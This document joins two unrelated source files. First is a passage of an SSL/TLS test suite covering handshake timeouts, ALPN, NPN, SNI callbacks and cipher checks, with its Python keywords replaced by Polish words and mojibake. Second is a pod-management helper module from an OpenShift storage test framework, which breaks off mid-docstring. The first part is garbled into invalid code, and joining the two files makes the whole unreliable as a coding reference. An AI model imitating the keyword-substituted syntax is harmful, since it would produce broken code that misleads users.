s.recvmsg_into, bytearray(100))
s.write(b"over\n")
s.close()
def test_nonblocking_send(self):
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=Prawda,
connectionchatty=Nieprawda)
przy server:
s = ssl.wrap_socket(socket.socket(),
server_side=Nieprawda,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
s.setblocking(Nieprawda)
# If we keep sending data, at some point the buffers
# will be full oraz the call will block
buf = bytearray(8192)
def fill_buffer():
dopรณki Prawda:
s.send(buf)
self.assertRaises((ssl.SSLWantWriteError,
ssl.SSLWantReadError), fill_buffer)
# Now read all the output oraz discard it
s.setblocking(Prawda)
s.close()
def test_handshake_timeout(self):
# Issue #5103: SSL handshake must respect the socket timeout
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
started = threading.Event()
finish = Nieprawda
def serve():
server.listen()
started.set()
conns = []
dopรณki nie finish:
r, w, e = select.select([server], [], [], 0.1)
jeลผeli server w r:
# Let the socket hang around rather than having
# it closed by garbage collection.
conns.append(server.accept()[0])
dla sock w conns:
sock.close()
t = threading.Thread(target=serve)
t.start()
started.wait()
sprรณbuj:
sprรณbuj:
c = socket.socket(socket.AF_INET)
c.settimeout(0.2)
c.connect((host, port))
# Will attempt handshake oraz time out
self.assertRaisesRegex(socket.timeout, "timed out",
ssl.wrap_socket, c)
w_koลcu:
c.close()
sprรณbuj:
c = socket.socket(socket.AF_INET)
c = ssl.wrap_socket(c)
c.settimeout(0.2)
# Will attempt handshake oraz time out
self.assertRaisesRegex(socket.timeout, "timed out",
c.connect, (host, port))
w_koลcu:
c.close()
w_koลcu:
finish = Prawda
t.join()
server.close()
def test_server_accept(self):
# Issue #16357: accept() on a SSLSocket created through
# SSLContext.wrap_socket().
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = socket.socket(socket.AF_INET)
host = "127.0.0.1"
port = support.bind_port(server)
server = context.wrap_socket(server, server_side=Prawda)
evt = threading.Event()
remote = Nic
peer = Nic
def serve():
nonlocal remote, peer
server.listen()
# Block on the accept oraz wait on the connection to close.
evt.set()
remote, peer = server.accept()
remote.recv(1)
t = threading.Thread(target=serve)
t.start()
# Client wait until server setup oraz perform a connect.
evt.wait()
client = context.wrap_socket(socket.socket())
client.connect((host, port))
client_addr = client.getsockname()
client.close()
t.join()
remote.close()
server.close()
# Sanity checks.
self.assertIsInstance(remote, ssl.SSLSocket)
self.assertEqual(peer, client_addr)
def test_getpeercert_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
przy context.wrap_socket(socket.socket()) jako sock:
przy self.assertRaises(OSError) jako cm:
sock.getpeercert()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_do_handshake_enotconn(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
przy context.wrap_socket(socket.socket()) jako sock:
przy self.assertRaises(OSError) jako cm:
sock.do_handshake()
self.assertEqual(cm.exception.errno, errno.ENOTCONN)
def test_default_ciphers(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
sprรณbuj:
# Force a set of weak ciphers on our client context
context.set_ciphers("DES")
wyjฤ
wszy ssl.SSLError:
self.skipTest("no DES cipher available")
przy ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_SSLv23,
chatty=Nieprawda) jako server:
przy context.wrap_socket(socket.socket()) jako s:
przy self.assertRaises(OSError):
s.connect((HOST, server.port))
self.assertIn("no shared cipher", str(server.conn_errors[0]))
def test_version_basic(self):
"""
Basic tests dla SSLSocket.version().
More tests are done w the test_protocol_*() methods.
"""
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
przy ThreadedEchoServer(CERTFILE,
ssl_version=ssl.PROTOCOL_TLSv1,
chatty=Nieprawda) jako server:
przy context.wrap_socket(socket.socket()) jako s:
self.assertIs(s.version(), Nic)
s.connect((HOST, server.port))
self.assertEqual(s.version(), "TLSv1")
self.assertIs(s.version(), Nic)
@unittest.skipUnless(ssl.HAS_ECDH, "test requires ECDH-enabled OpenSSL")
def test_default_ecdh_curve(self):
# Issue #21015: elliptic curve-based Diffie Hellman key exchange
# should be enabled by default on SSL contexts.
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.load_cert_chain(CERTFILE)
# Prior to OpenSSL 1.0.0, ECDH ciphers have to be enabled
# explicitly using the 'ECCdraft' cipher alias. Otherwise,
# our default cipher list should prefer ECDH-based ciphers
# automatically.
jeลผeli ssl.OPENSSL_VERSION_INFO < (1, 0, 0):
context.set_ciphers("ECCdraft:ECDH")
przy ThreadedEchoServer(context=context) jako server:
przy context.wrap_socket(socket.socket()) jako s:
s.connect((HOST, server.port))
self.assertIn("ECDH", s.cipher()[0])
@unittest.skipUnless("tls-unique" w ssl.CHANNEL_BINDING_TYPES,
"'tls-unique' channel binding nie available")
def test_tls_unique_channel_binding(self):
"""Test tls-unique channel binding."""
jeลผeli support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1,
cacerts=CERTFILE,
chatty=Prawda,
connectionchatty=Nieprawda)
przy server:
s = ssl.wrap_socket(socket.socket(),
server_side=Nieprawda,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
# get the data
cb_data = s.get_channel_binding("tls-unique")
jeลผeli support.verbose:
sys.stdout.write(" got channel binding data: {0!r}\n"
.format(cb_data))
# check jeลผeli it jest sane
self.assertIsNotNic(cb_data)
self.assertEqual(len(cb_data), 12) # Prawda dla TLSv1
# oraz compare przy the peers version
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(cb_data).encode("us-ascii"))
s.close()
# now, again
s = ssl.wrap_socket(socket.socket(),
server_side=Nieprawda,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLSv1)
s.connect((HOST, server.port))
new_cb_data = s.get_channel_binding("tls-unique")
jeลผeli support.verbose:
sys.stdout.write(" got another channel binding data: {0!r}\n"
.format(new_cb_data))
# jest it really unique
self.assertNotEqual(cb_data, new_cb_data)
self.assertIsNotNic(cb_data)
self.assertEqual(len(cb_data), 12) # Prawda dla TLSv1
s.write(b"CB tls-unique\n")
peer_data_repr = s.read().strip()
self.assertEqual(peer_data_repr,
repr(new_cb_data).encode("us-ascii"))
s.close()
def test_compression(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=Prawda, connectionchatty=Prawda)
jeลผeli support.verbose:
sys.stdout.write(" got compression: {!r}\n".format(stats['compression']))
self.assertIn(stats['compression'], { Nic, 'ZLIB', 'RLE' })
@unittest.skipUnless(hasattr(ssl, 'OP_NO_COMPRESSION'),
"ssl.OP_NO_COMPRESSION needed dla this test")
def test_compression_disabled(self):
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.options |= ssl.OP_NO_COMPRESSION
stats = server_params_test(context, context,
chatty=Prawda, connectionchatty=Prawda)
self.assertIs(stats['compression'], Nic)
def test_dh_params(self):
# Check we can get a connection przy ephemeral Diffie-Hellman
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.load_dh_params(DHFILE)
context.set_ciphers("kEDH")
stats = server_params_test(context, context,
chatty=Prawda, connectionchatty=Prawda)
cipher = stats["cipher"][0]
parts = cipher.split("-")
jeลผeli "ADH" nie w parts oraz "EDH" nie w parts oraz "DHE" nie w parts:
self.fail("Non-DH cipher: " + cipher[0])
def test_selected_alpn_protocol(self):
# selected_alpn_protocol() jest Nic unless ALPN jest used.
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=Prawda, connectionchatty=Prawda)
self.assertIs(stats['client_alpn_protocol'], Nic)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support required")
def test_selected_alpn_protocol_if_server_uses_alpn(self):
# selected_alpn_protocol() jest Nic unless ALPN jest used by the client.
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_verify_locations(CERTFILE)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_alpn_protocols(['foo', 'bar'])
stats = server_params_test(client_context, server_context,
chatty=Prawda, connectionchatty=Prawda)
self.assertIs(stats['client_alpn_protocol'], Nic)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support needed dla this test")
def test_alpn_protocols(self):
server_protocols = ['foo', 'bar', 'milkshake']
protocol_tests = [
(['foo', 'bar'], 'foo'),
(['bar', 'foo'], 'foo'),
(['milkshake'], 'milkshake'),
(['http/3.0', 'http/4.0'], Nic)
]
dla client_protocols, expected w protocol_tests:
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_alpn_protocols(server_protocols)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_cert_chain(CERTFILE)
client_context.set_alpn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=Prawda, connectionchatty=Prawda)
msg = "failed trying %s (s) oraz %s (c).\n" \
"was expecting %s, but got %%s z the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_alpn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_alpn_protocols'][-1] \
jeลผeli len(stats['server_alpn_protocols']) inaczej 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def test_selected_npn_protocol(self):
# selected_npn_protocol() jest Nic unless NPN jest used
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=Prawda, connectionchatty=Prawda)
self.assertIs(stats['client_npn_protocol'], Nic)
@unittest.skipUnless(ssl.HAS_NPN, "NPN support needed dla this test")
def test_npn_protocols(self):
server_protocols = ['http/1.1', 'spdy/2']
protocol_tests = [
(['http/1.1', 'spdy/2'], 'http/1.1'),
(['spdy/2', 'http/1.1'], 'http/1.1'),
(['spdy/2', 'test'], 'spdy/2'),
(['abc', 'def'], 'abc')
]
dla client_protocols, expected w protocol_tests:
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_npn_protocols(server_protocols)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_cert_chain(CERTFILE)
client_context.set_npn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=Prawda, connectionchatty=Prawda)
msg = "failed trying %s (s) oraz %s (c).\n" \
"was expecting %s, but got %%s z the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_npn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_npn_protocols'][-1] \
jeลผeli len(stats['server_npn_protocols']) inaczej 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_verify_locations(SIGNING_CA)
zwrรณฤ server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
@needs_sni
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
jeลผeli server_name jest nie Nic:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=Prawda,
sni_name='supermessage')
# The hostname was fetched properly, oraz the certificate was
# changed dla the connection.
self.assertEqual(calls, [("supermessage", server_context)])
# CERTFILE4 was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback jest called przy server_name=Nic
stats = server_params_test(client_context, server_context,
chatty=Prawda,
sni_name=Nic)
self.assertEqual(calls, [(Nic, server_context)])
self.check_common_name(stats, 'localhost')
# Check disabling the callback
calls = []
server_context.set_servername_callback(Nic)
stats = server_params_test(client_context, server_context,
chatty=Prawda,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, 'localhost')
self.assertEqual(calls, [])
@needs_sni
def test_sni_callback_alert(self):
# Returning a TLS alert jest reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
zwrรณฤ ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
przy self.assertRaises(ssl.SSLError) jako cm:
stats = server_params_test(client_context, server_context,
chatty=Nieprawda,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
@needs_sni
def test_sni_callback_raising(self):
# Raising fails the connection przy a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
1/0
server_context.set_servername_callback(cb_raising)
przy self.assertRaises(ssl.SSLError) jako cm, \
support.captured_stderr() jako stderr:
stats = server_params_test(client_context, server_context,
chatty=Nieprawda,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertIn("ZeroDivisionError", stderr.getvalue())
@needs_sni
def test_sni_callback_wrong_return_type(self):
# Returning the wrong zwrรณฤ type terminates the TLS connection
# przy an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
zwrรณฤ "foo"
server_context.set_servername_callback(cb_wrong_return_type)
przy self.assertRaises(ssl.SSLError) jako cm, \
support.captured_stderr() jako stderr:
stats = server_params_test(client_context, server_context,
chatty=Nieprawda,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertIn("TypeError", stderr.getvalue())
def test_shared_ciphers(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_verify_locations(SIGNING_CA)
client_context.set_ciphers("RC4")
server_context.set_ciphers("AES:RC4")
stats = server_params_test(client_context, server_context)
ciphers = stats['server_shared_ciphers'][0]
self.assertGreater(len(ciphers), 0)
dla name, tls_version, bits w ciphers:
self.assertIn("RC4", name.split("-"))
def test_read_write_after_close_raises_valuerror(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=Nieprawda)
przy server:
s = context.wrap_socket(socket.socket())
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_sendfile(self):
TEST_DATA = b"x" * 512
przy open(support.TESTFN, 'wb') jako f:
f.write(TEST_DATA)
self.addCleanup(support.unlink, support.TESTFN)
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=Nieprawda)
przy server:
przy context.wrap_socket(socket.socket()) jako s:
s.connect((HOST, server.port))
przy open(support.TESTFN, 'rb') jako file:
s.sendfile(file)
self.assertEqual(s.recv(1024), TEST_DATA)
def test_main(verbose=Nieprawda):
jeลผeli support.verbose:
zaimportuj warnings
plats = {
'Linux': platform.linux_distribution,
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
przy warnings.catch_warnings():
warnings.filterwarnings(
'ignore',
'dist\(\) oraz linux_distribution\(\) '
'functions are deprecated .*',
PendingDeprecationWarning,
)
dla name, func w plats.items():
plat = func()
jeลผeli plat oraz plat[0]:
plat = '%s %r' % (name, plat)
przerwij
inaczej:
plat = repr(platform.platform())
print("test_ssl: testing przy %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
sprรณbuj:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
wyjฤ
wszy AttributeError:
dalej
dla filename w [
CERTFILE, SVN_PYTHON_ORG_ROOT_CERT, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
jeลผeli nie os.path.exists(filename):
podnieล support.TestFailed("Can't read certificate file %r" % filename)
tests = [ContextTests, BasicSocketTests, SSLErrorTests, MemoryBIOTests]
jeลผeli support.is_resource_enabled('network'):
tests.append(NetworkedTests)
tests.append(NetworkedBIOTests)
jeลผeli _have_threads:
thread_info = support.threading_setup()
jeลผeli thread_info:
tests.append(ThreadedTests)
sprรณbuj:
support.run_unittest(*tests)
w_koลcu:
jeลผeli _have_threads:
support.threading_cleanup(*thread_info)
jeลผeli __name__ == "__main__":
test_main()
|
pod.py | """
Pod related functionalities and context info
Each pod in the openshift cluster will have a corresponding pod object
"""
import logging
import os
import re
import yaml
import tempfile
import time
import calendar
from threading import Thread
import base64
from semantic_version import Version
from ocs_ci.ocs.bucket_utils import craft_s3_command
from ocs_ci.ocs.ocp import OCP, verify_images_upgraded
from ocs_ci.helpers import helpers
from ocs_ci.helpers.proxy import update_container_with_proxy_env
from ocs_ci.ocs import constants, defaults, node, workload, ocp
from ocs_ci.framework import config
from ocs_ci.ocs.exceptions import (
CommandFailed,
NonUpgradedImagesFoundError,
ResourceWrongStatusException,
TimeoutExpiredError,
UnavailableResourceException,
ResourceNotFoundError,
)
from ocs_ci.ocs.utils import setup_ceph_toolbox, get_pod_name_by_pattern
from ocs_ci.ocs.resources.ocs import OCS
from ocs_ci.ocs.resources.job import get_job_obj, get_jobs_with_prefix
from ocs_ci.utility import templating
from ocs_ci.utility.utils import (
run_cmd,
check_timeout_reached,
TimeoutSampler,
get_ocp_version,
)
from ocs_ci.utility.utils import check_if_executable_in_path
from ocs_ci.utility.retry import retry
logger = logging.getLogger(__name__)
FIO_TIMEOUT = 600
TEXT_CONTENT = (
"Lorem ipsum dolor sit amet, consectetur adipiscing elit, "
"sed do eiusmod tempor incididunt ut labore et dolore magna "
"aliqua. Ut enim ad minim veniam, quis nostrud exercitation "
"ullamco laboris nisi ut aliquip ex ea commodo consequat. "
"Duis aute irure dolor in reprehenderit in voluptate velit "
"esse cillum dolore eu fugiat nulla pariatur. Excepteur sint "
"occaecat cupidatat non proident, sunt in culpa qui officia "
"deserunt mollit anim id est laborum."
)
TEST_FILE = "/var/lib/www/html/test"
FEDORA_TEST_FILE = "/mnt/test"
class Pod(OCS):
    """
    Handles per pod related context
    """

    def __init__(self, **kwargs):
        """
        Initializer function

        Args:
            **kwargs: Copy of ocs/defaults.py::<some pod> dictionary
        """
        self.pod_data = kwargs
        # configure http[s]_proxy env variable, if applicable
        update_container_with_proxy_env(self.pod_data)
        super(Pod, self).__init__(**kwargs)

        # The temp file is created with delete=False so its path stays valid
        # after the handle is closed; only the unique name is kept here.
        with tempfile.NamedTemporaryFile(
            mode="w+", prefix="POD_", delete=False
        ) as temp_info:
            self.temp_yaml = temp_info.name

        self._name = self.pod_data.get("metadata").get("name")
        self._labels = self.get_labels()
        self._roles = []
        self.ocp = OCP(
            api_version=defaults.API_VERSION,
            kind=constants.POD,
            namespace=self.namespace,
        )
        self.fio_thread = None
        # TODO: get backend config !!
        self.wl_obj = None
        self.wl_setup_done = False
@property
def name(self):
    """str: Pod name, cached from metadata at construction time."""
    return self._name

@property
def namespace(self):
    """str: Namespace the pod lives in."""
    return self._namespace

@property
def roles(self):
    """list: Roles assigned to this pod via ``add_role``."""
    return self._roles

@property
def labels(self):
    """dict: Openshift labels, cached at construction time."""
    return self._labels

@property
def restart_count(self):
    """int: restartCount of the FIRST container, from a fresh ``get()``."""
    return self.get().get("status").get("containerStatuses")[0].get("restartCount")

def __setattr__(self, key, val):
    # Write straight into __dict__, bypassing any __setattr__ logic of the
    # base class.  NOTE(review): presumably done to avoid OCS attribute
    # handling - confirm against the OCS base class.
    self.__dict__[key] = val
def add_role(self, role):
    """
    Adds a new role for this pod

    Args:
        role (str): New role to be assigned for this pod
    """
    self._roles.append(role)
def get_fio_results(self, timeout=FIO_TIMEOUT):
    """
    Get FIO execution results

    Args:
        timeout (int): Seconds to wait for the FIO thread result

    Returns:
        dict: Dictionary represents the FIO execution results

    Raises:
        CommandFailed: If FIO produced no output
        Exception: In case of exception from FIO
    """
    logger.info(f"Waiting for FIO results from pod {self.name}")
    try:
        result = self.fio_thread.result(timeout)
        if result:
            return yaml.safe_load(result)
        # Empty/falsy output means FIO did not report results
        raise CommandFailed(f"FIO execution results: {result}.")
    except CommandFailed as ex:
        logger.exception(f"FIO failed: {ex}")
        raise
    except Exception as ex:
        logger.exception(f"Found Exception: {ex}")
        raise
def exec_cmd_on_pod(
    self, command, out_yaml_format=True, secrets=None, timeout=600, **kwargs
):
    """
    Execute a command on a pod (e.g. oc rsh)

    Args:
        command (str): The command to execute on the given pod
        out_yaml_format (bool): whether to return yaml loaded python
            object OR to return raw output
        secrets (list): A list of secrets to be masked with asterisks
            This kwarg is popped in order to not interfere with
            subprocess.run(``**kwargs``)
        timeout (int): timeout for the exec_oc_cmd, defaults to 600 seconds

    Returns:
        Munch Obj: This object represents a returned yaml file
    """
    rsh_cmd = f"rsh {self.name} {command}"
    return self.ocp.exec_oc_cmd(
        rsh_cmd, out_yaml_format, secrets=secrets, timeout=timeout, **kwargs
    )
def exec_s3_cmd_on_pod(self, command, mcg_obj=None):
    """
    Execute an S3 command on a pod

    Args:
        command (str): The command to execute on the given pod
        mcg_obj (MCG): An MCG object containing the MCG S3 connection credentials

    Returns:
        Munch Obj: This object represents a returned yaml file
    """
    # Mask the S3 credentials in logged output when they are available
    secrets = (
        [mcg_obj.access_key_id, mcg_obj.access_key, mcg_obj.s3_endpoint]
        if mcg_obj
        else None
    )
    return self.exec_cmd_on_pod(
        craft_s3_command(command, mcg_obj),
        out_yaml_format=False,
        secrets=secrets,
    )
def exec_sh_cmd_on_pod(self, command, sh="bash"):
    """
    Execute a pure shell command on a pod via oc exec, where you can use
    shell syntax like &&, ||, ;, for loops and so on.

    Args:
        command (str): The command to execute on the given pod
        sh (str): Shell to run the command with (default: bash)

    Returns:
        str: stdout of the command
    """
    cmd = f'exec {self.name} -- {sh} -c "{command}"'
    return self.ocp.exec_oc_cmd(cmd, out_yaml_format=False)
def get_labels(self):
    """
    Get labels from the cached pod data.

    Returns:
        dict: All the openshift labels on a given pod, or None if the
            metadata carries no labels.
    """
    return self.pod_data.get("metadata").get("labels")
def exec_ceph_cmd(self, ceph_cmd, format="json-pretty"):
    """
    Execute a Ceph command on the Ceph tools pod

    Args:
        ceph_cmd (str): The Ceph command to execute on the Ceph tools pod
        format (str): The returning output format of the Ceph command.
            Pass a falsy value to skip appending ``--format``.

    Returns:
        dict: Ceph command output

    Raises:
        CommandFailed: In case the pod is not a toolbox pod
    """
    if "rook-ceph-tools" not in self.labels.values():
        raise CommandFailed("Ceph commands can be executed only on toolbox pod")
    if format:
        ceph_cmd += f" --format {format}"
    out = self.exec_cmd_on_pod(ceph_cmd)
    # For some commands, like "ceph fs ls", the returned output is a list;
    # drop empty entries.
    if isinstance(out, list):
        return [item for item in out if item]
    return out
def get_storage_path(self, storage_type="fs"):
    """
    Get the pod volume mount path or device path

    Args:
        storage_type (str): 'fs' or 'block'

    Returns:
        str: The mount path of the volume on the pod (e.g. /var/lib/www/html/)
            if storage_type is 'fs', else the device path of the raw block pv
    """
    # TODO: Allow returning a path of a specified volume of a specified
    # container
    container = self.pod_data.get("spec").get("containers")[0]
    if storage_type == "block":
        return container.get("volumeDevices")[0].get("devicePath")
    return container.get("volumeMounts")[0].get("mountPath")
def workload_setup(self, storage_type, jobs=1):
    """
    Do setup on pod for running FIO

    Args:
        storage_type (str): 'fs' or 'block'
        jobs (int): Number of jobs to execute FIO
    """
    work_load = "fio"
    name = f"test_workload_{work_load}"
    path = self.get_storage_path(storage_type)
    # few io parameters for Fio
    self.wl_obj = workload.WorkLoad(name, path, work_load, storage_type, self, jobs)
    assert self.wl_obj.setup(), f"Setup for FIO failed on pod {self.name}"
    self.wl_setup_done = True
def run_io(
    self,
    storage_type,
    size,
    io_direction="rw",
    rw_ratio=75,
    jobs=1,
    runtime=60,
    depth=4,
    rate="1m",
    rate_process="poisson",
    fio_filename=None,
    bs="4K",
    end_fsync=0,
    invalidate=None,
):
    """
    Execute FIO on a pod.

    This operation will run in background and will store the results in
    'self.thread.result()'.
    In order to wait for the output and not continue with the test until
    FIO is done, call self.thread.result() right after calling run_io.
    See tests/manage/test_pvc_deletion_during_io.py::test_run_io
    for usage of FIO

    Args:
        storage_type (str): 'fs' or 'block'
        size (str): Size in MB, e.g. '200M'; a non-string is formatted as GiB
        io_direction (str): Determines the operation:
            'ro', 'wo', 'rw' (default: 'rw')
        rw_ratio (int): Determines the reads and writes using a
            <rw_ratio>%/100-<rw_ratio>%
            (e.g. the default is 75 which means it is 75%/25% which
            equivalent to 3 reads are performed for every 1 write)
        jobs (int): Number of jobs to execute FIO
        runtime (int): Number of seconds IO should run for
        depth (int): IO depth
        rate (str): rate of IO default 1m, e.g. 16k
        rate_process (str): kind of rate process default poisson, e.g. poisson
        fio_filename(str): Name of fio file created on app pod's mount point
        bs (str): Block size, e.g. 4K
        end_fsync (int): If 1, fio will sync file contents when a write
            stage has completed. Fio default is 0
        invalidate (bool): Invalidate the buffer/page cache parts of the
            files to be used prior to starting I/O
    """
    if not self.wl_setup_done:
        self.workload_setup(storage_type=storage_type, jobs=jobs)

    # rw workloads use a dedicated params template carrying rwmixread
    if io_direction == "rw":
        self.io_params = templating.load_yaml(constants.FIO_IO_RW_PARAMS_YAML)
        self.io_params["rwmixread"] = rw_ratio
    else:
        self.io_params = templating.load_yaml(constants.FIO_IO_PARAMS_YAML)
    if invalidate is not None:
        self.io_params["invalidate"] = invalidate
    self.io_params["runtime"] = runtime
    # Numeric sizes are interpreted as GiB
    size = size if isinstance(size, str) else f"{size}G"
    self.io_params["size"] = size
    if fio_filename:
        self.io_params["filename"] = fio_filename
    self.io_params["iodepth"] = depth
    self.io_params["rate"] = rate
    self.io_params["rate_process"] = rate_process
    self.io_params["bs"] = bs
    if end_fsync:
        self.io_params["end_fsync"] = end_fsync
    self.fio_thread = self.wl_obj.run(**self.io_params)
def fillup_fs(self, size, fio_filename=None):
    """
    Execute FIO on a pod to fill up a file.

    This will run sequential IO of 1MB block size to fill up the file with
    data.
    This operation will run in background and will store the results in
    'self.thread.result()'.
    In order to wait for the output and not continue with the test until
    FIO is done, call self.thread.result() right after calling run_io.
    See tests/manage/test_pvc_deletion_during_io.py::test_run_io
    for usage of FIO

    Args:
        size (str): Size in MB, e.g. '200M'; a non-string is formatted as MiB
        fio_filename(str): Name of fio file created on app pod's mount point
    """
    if not self.wl_setup_done:
        self.workload_setup(storage_type="fs", jobs=1)

    self.io_params = templating.load_yaml(constants.FIO_IO_FILLUP_PARAMS_YAML)
    # Numeric sizes are interpreted as MiB here (unlike run_io, which uses GiB)
    size = size if isinstance(size, str) else f"{size}M"
    self.io_params["size"] = size
    if fio_filename:
        self.io_params["filename"] = fio_filename
    self.fio_thread = self.wl_obj.run(**self.io_params)
def run_git_clone(self, skip_install=True):
    """
    Execute git clone on a pod to simulate a Jenkins user

    Args:
        skip_install (bool): By default True, skips git package
            installation in pod
    """
    name = "test_workload"
    work_load = "jenkins"
    wl = workload.WorkLoad(
        name=name, work_load=work_load, pod=self, path=self.get_storage_path()
    )
    if not skip_install:
        assert wl.setup(), "Setup for git failed"
    wl.run()
def install_packages(self, packages):
    """
    Install packages in a Pod

    Args:
        packages (list or str): List of packages (or a single package name)
            to install
    """
    if isinstance(packages, list):
        packages = " ".join(packages)
    cmd = f"yum install {packages} -y"
    self.exec_cmd_on_pod(cmd, out_yaml_format=False)
def copy_to_server(self, server, authkey, localpath, remotepath, user=None):
    """
    Upload a file from pod to server

    Args:
        server (str): Name of the server to upload
        authkey (str): Authentication file (.pem file)
        localpath (str): Local file/dir in pod to upload
        remotepath (str): Target path on the remote server
        user (str): User name to connect to server (default: root)
    """
    user = user or "root"
    cmd = (
        f'scp -i {authkey} -o "StrictHostKeyChecking no"'
        f" -r {localpath} {user}@{server}:{remotepath}"
    )
    self.exec_cmd_on_pod(cmd, out_yaml_format=False)
def exec_cmd_on_node(self, server, authkey, cmd, user=None):
    """
    Run command on a remote server from pod

    Args:
        server (str): Name of the server to run the command
